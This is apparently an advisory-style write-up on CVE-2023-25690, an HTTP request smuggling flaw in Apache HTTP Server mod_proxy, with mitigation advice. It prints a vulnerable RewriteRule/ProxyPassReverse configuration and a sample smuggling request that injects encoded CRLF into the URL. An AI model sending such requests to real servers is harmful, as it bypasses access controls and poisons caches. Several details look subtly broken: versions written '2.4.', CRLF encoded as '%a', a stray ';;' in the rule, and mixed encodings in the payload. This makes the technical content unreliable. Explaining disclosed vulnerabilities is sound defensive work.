CVE-2023-25690: HTTP Request Smuggling Attack in mod_proxy Configurations on Apache HTTP Server Versions 2.4. to 2.4.55

A vulnerability has been identified in some mod_proxy configurations on Apache HTTP Server versions 2.4. through 2.4.55, which allows attackers to execute HTTP Request Smuggling attacks. This vulnerability, identified as CVE-2023-25690, affects configurations where mod_proxy is enabled along with specific patterns of RewriteRule or ProxyPassMatch. Attackers can exploit this vulnerability to bypass access controls in the proxy server, proxy unintended URLs to existing origin servers, and poison cache data.

The following is an example of a vulnerable configuration pattern

RewriteEngine on
RewriteRule "^/here/(.*)" "http://example.com:808/elsewhere?$1";; [P]
ProxyPassReverse /here/ http://example.com:808/

In this pattern, a non-specific matching occurs on some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution.

Original References

The vulnerability was initially disclosed on the Apache HTTP Server project's security page. Detailed information about the vulnerability and its impact can be found under the "2.4.x vulnerabilities" section, specifically the "CVE-2023-25690" entry.

Exploit Details

Exploiting this vulnerability involves sending a single HTTP request that includes two sets of request headers. The request headers are often separated by CRLF (Carriage Return Line Feed) characters. By injecting a CRLF sequence into the URL data, an attacker can create a request that appears to be two separate requests to the proxy server, allowing them to smuggle the second request past security controls and reach unintended URLs on origin servers.

For example, an attacker might send the following HTTP request

GET /here/%aContent-Length:%200%a%aGET%20/%20HTTP/1.1\r\nHost: example.com\r\n ...

In this case, the CRLF sequence %a is URL-encoded and injected into the URL data, which splits the request into two separate requests when decoded by the proxy server. This is just one example of how an attacker could smuggle a request past security controls.

Mitigation

Users of Apache HTTP Server versions 2.4. to 2.4.55 are recommended to update their installation to at least version 2.4.56, which contains a fix for this vulnerability. Alternatively, users can review their mod_proxy configurations and modify them to avoid using non-specific patterns that could be exploited.

The latest version of Apache HTTP Server can be downloaded from the official website.

Conclusion

CVE-2023-25690 is a critical vulnerability affecting some mod_proxy configurations on Apache HTTP Server versions 2.4. through 2.4.55. The vulnerability allows attackers to execute HTTP Request Smuggling attacks, potentially bypassing access controls, proxying unintended URLs, and poisoning caches. Users should update their installations to at least version 2.4.56 to prevent exploitation.

Timeline

Published on: 03/07/2023 16:15:00 UTC
Last modified on: 03/14/2023 15:41:00 UTC